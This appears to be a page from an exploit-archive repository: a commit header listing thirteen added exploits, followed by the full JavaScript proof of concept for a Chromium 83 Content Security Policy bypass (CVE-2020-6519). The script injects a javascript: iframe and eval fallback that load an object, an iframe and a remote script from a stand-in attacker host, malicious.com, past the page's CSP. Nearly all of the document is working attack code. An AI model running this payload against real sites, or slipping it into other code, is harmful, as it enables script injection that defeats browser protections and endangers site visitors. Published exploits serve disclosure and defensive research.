045c2fe1ae
13 changes to exploits/shellcodes IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path Chromium 83 - Full CSP Bypass Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection MiniCMS 1.10 - 'content box' Stored XSS Testa Online Test Management System 3.4.7 - 'q' SQL Injection Savsoft Quiz 5 - 'field_title' Stored Cross-Site Scripting Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting Laravel Nova 3.7.0 - 'range' DoS CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated) Zabbix 5.0.0 - Stored XSS via URL Widget Iframe
34 lines
No EOL
1 KiB
JavaScript
34 lines
No EOL
1 KiB
JavaScript
#Title: Chromium 83 - Full CSP Bypass
|
|
#Date: 02/09/2020
|
|
#Exploit Author: Gal Weizman
|
|
#Vendor Homepage: https://www.chromium.org/
|
|
#Software Link: https://download-chromium.appspot.com/
|
|
#Version: 83
|
|
#Tested On: Mac OS, Windows, iPhone, Android
|
|
#CVE: CVE-2020-6519
|
|
|
|
(function(){
|
|
|
|
var payload = `
|
|
top.SUCCESS = true;
|
|
var o = document.createElement("object");
|
|
o.data = \`http://malicious.com/bypass-object-src.html\`;
|
|
document.body.appendChild(o);
|
|
var i = document.createElement("iframe");
|
|
i.src = \`http://malicious.com/bypass-child-src.html\`;
|
|
document.body.appendChild(i);
|
|
var s = document.createElement("script");
|
|
s.src = \`http://malicious.com/bypass-script-src.js\`;
|
|
document.body.appendChild(s);
|
|
`;
|
|
|
|
document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>";
|
|
setTimeout(() => {
|
|
if (!top.SUCCESS) {
|
|
XXX.contentWindow.eval(payload);
|
|
}
|
|
});
|
|
|
|
}())
|
|
|
|
// further information: https://github.com/weizman/CVE-2020-6519
|